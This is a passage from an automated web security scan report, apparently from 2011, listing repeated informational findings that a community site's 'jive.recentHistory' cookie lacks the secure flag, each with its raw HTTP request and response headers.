Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343036353b312c35333137323b312c35343035383b312c35333135383b312c34373636333b312c35333331323b312c35333235323b312c35333331393b312c35333037353b312c35333334333b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.166. https://www.x.com/message/215254  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343035383b312c35333137323b312c35333235323b312c35333135383b312c34373636333b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.167. https://www.x.com/message/215264  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333838343b312c35333937373b312c35333135383b312c34373636333b312c35333137323b312c35343035383b312c35343036353b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.168. https://www.x.com/message/215276  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333937373b312c35343036353b312c35343035383b312c34373636333b312c35333838343b312c35333135383b312c35333137323b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.169. https://www.x.com/message/215291  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34373636333b312c35343035383b312c35333137323b312c35333135383b312c35333235323b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.170. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.171. https://www.x.com/people/CorinneSherman  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.172. https://www.x.com/people/GiancarloUk2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.173. https://www.x.com/people/IndieReign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.174. https://www.x.com/people/JasonVenner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.175. https://www.x.com/people/MrcheckAPX  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.176. https://www.x.com/people/PP_Igor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.177. https://www.x.com/people/PP_MTS_Andre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.178. https://www.x.com/people/PP_MTS_Chad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.179. https://www.x.com/people/PP_MTS_GuidoT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.180. https://www.x.com/people/PP_MTS_Magarvin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35333639373b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.181. https://www.x.com/people/PP_MTS_Patrick  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133313833303b332c3132393239303b332c3133373135383b332c3133373331333b332c3132323335343b332c3133393730313b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.182. https://www.x.com/people/PayPalXadmin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.183. https://www.x.com/people/PayPal_Carolyn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.184. https://www.x.com/people/PayPal_Sudha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.185. https://www.x.com/people/PayPal_ToddS  previous  next

